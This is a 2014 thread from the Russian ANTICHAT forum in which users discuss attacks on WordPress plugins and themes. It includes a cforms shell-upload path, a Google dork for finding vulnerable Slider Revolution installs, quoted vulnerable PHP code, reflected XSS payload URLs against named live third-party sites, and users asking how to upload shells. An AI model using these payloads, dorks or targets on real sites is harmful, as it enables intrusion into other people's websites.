ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

12.04.2014, 19:15
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от jangle
jangle said:
to BigBear
Этот uploader у тебя как сплойт или работает при имеющимся доступе к админке? И это для привата или гдето сие чудо можно протестить? Для каких версий WP?
Версии с 1.0 по 3.8.6 - специально ставил каждую и переписывал сплойт под англо/ру/ино язычные сайты.
В паблике такого не найдёшь.
Протестировать нигде. Но в рамках паблик-ачат-тестирования - пару сайтов пробью.
|
|
|

16.04.2014, 05:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 15532
Репутация:
4
|
|
Кто-нибудь может пояснить эту уязвимость - http://1337day.com/exploit/22012 ? В частности Directory Traversal/Arbitrary code execution/Arbitrary File read. Сколько не читал, не проникнусь, что и как делается.
|
|
|
|

18.05.2014, 22:15
|
|
Новичок
Регистрация: 31.10.2009
Сообщений: 1
Провел на форуме: 156763
Репутация:
0
|
|
а есть какие нибудь софты для проверки на уязвимость? актуальные и хорошие. так как в наше время вроде уже хрен найдешь с уязвимостью +(
|
|
|

05.06.2014, 13:08
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
exploit cforms 14.6 shell upload
Плагин: cforms 14.6 - последняя версия на сегодня!
shell upload
оффициальный сайт:
Сообщение от None
_ttp://www.deliciousdays.com/cforms-plugin/
При настройках по умолчанию и с формой для заливки файлов, льет:
Сообщение от None
localhost/wp-content/plugins/cforms/noid-shell.php
для исключения подобной возможности, в настройках можно указать отдельную папку для заливкии положить в нее .htaccess c запретом выполнения скриптов, или переписать скрипт.
|
|
|

12.08.2014, 01:41
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 2
Провел на форуме: 7702
Репутация:
0
|
|
Dork : revslider.php "index of"
Wordpress Slider Revolution Responsive
|
|
|

12.08.2014, 16:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 2175
Репутация:
0
|
|
[QUOTE="look2009"]
look2009 said:
Dork : revslider.php "index of"
Wordpress Slider Revolution Responsive
|
|
|
|

21.08.2014, 10:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 2229
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
Плагин:
cforms 14.6
- последняя версия на сегодня!
shell upload
оффициальный сайт:
При настройках по умолчанию и с формой для заливки файлов, льет:
для исключения подобной возможности, в настройках можно указать отдельную папку для заливкии положить в нее .htaccess c запретом выполнения скриптов, или переписать скрипт.
Видел эти шеллы, но как лить?
|
|
|
|

29.09.2014, 18:25
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
Провел на форуме: 706093
Репутация:
97
|
|
Сообщение от Bahamut
Bahamut said:
Видел эти шеллы, но как лить?
Аналогично, ковырял так и не понял как лить, а шеллы встречаются довольно часто, находил на забугор форумах описание, о том, что нужно капать в сторону файла: lib_ajax.php, а именно переменную " r " или " rs " где то здесь:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]sajax_handle_client_request[/COLOR][COLOR="#007700"]() {
global[/COLOR][COLOR="#0000BB"]$sajax_export_list[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$mode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
if (! empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"rs"[/COLOR][COLOR="#007700"]]))
[/COLOR][COLOR="#0000BB"]$mode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"get"[/COLOR][COLOR="#007700"];
if (!empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"rs"[/COLOR][COLOR="#007700"]]))
[/COLOR][COLOR="#0000BB"]$mode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"post"[/COLOR][COLOR="#007700"];
if (empty([/COLOR][COLOR="#0000BB"]$mode[/COLOR][COLOR="#007700"]))
return;
[/COLOR][COLOR="#0000BB"]$target[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]### 10.02. Added header
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Type: text/javascript'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'X-Content-Type-Options: nosniff'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$mode[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"get"[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]### Bust cache in the head
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Expires: Mon, 26 Jul 1997 05:00:00 GMT"[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]### Date in the past
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Last-Modified: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]gmdate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"D, d M Y H:i:s"[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" GMT"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]### always modified
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Cache-Control: no-cache, must-revalidate"[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]### HTTP/1.1
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Pragma: no-cache"[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]### HTTP/1.0
[/COLOR][COLOR="#0000BB"]$func_name[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"rs"[/COLOR][COLOR="#007700"]] );[/COLOR][COLOR="#FF8000"]### 10.2.2012 sajax_sanitize removed
[/COLOR][COLOR="#007700"]if (! empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"rsargs"[/COLOR][COLOR="#007700"]]))
[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"rsargs"[/COLOR][COLOR="#007700"]] );[/COLOR][COLOR="#FF8000"]### 10.2.2012 sajax_sanitize removed
[/COLOR][COLOR="#007700"]else
[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]= array();
}
else {
[/COLOR][COLOR="#0000BB"]$func_name[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"rs"[/COLOR][COLOR="#007700"]] );[/COLOR][COLOR="#FF8000"]### 10.2.2012 sajax_sanitize removed
[/COLOR][COLOR="#007700"]if (! empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"rsargs"[/COLOR][COLOR="#007700"]]))
[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"rsargs"[/COLOR][COLOR="#007700"]] );[/COLOR][COLOR="#FF8000"]### 10.2.2012 sajax_sanitize removed
[/COLOR][COLOR="#007700"]else
[/COLOR][COLOR="#0000BB"]$args[/COLOR][COLOR="#007700"]= array();
}[/COLOR][/COLOR]
|
|
|

07.10.2014, 02:16
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Уязвимость в шаблонах для WordPress от автора "ronangelo" пасивная XSS
его темы можно идентифецировать по файлу readme.txt в корне темы:
Сообщение от None
http://localhost/wp-content/themes/asteroid/readme.txt
Примеры уязвимых сайтов:
Сообщение от None
_ttps://wp-themes.com/wp-content/themes/asteroid/includes/content-width.php?content_width=%3Cscript%3Ealert%28%22123 %22%29;%3C/script%3E
_ttp://rwandanationalparks.com/wp-content/themes/asteroid/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
_ttp://www.serpsherpa.com/wp-content/themes/frontier/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
_ttp://ramkrista.com/wp-content/themes/frontier/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
сам уязвимый код:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR].mceContentBody {width: [COLOR="#0000BB"][/COLOR]px;}[/COLOR]
статья, как лить шелл в WP при XSS:
Сообщение от None
_ttp://habrahabr.ru/company/dsec/blog/194282/
|
|
|

20.10.2014, 01:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|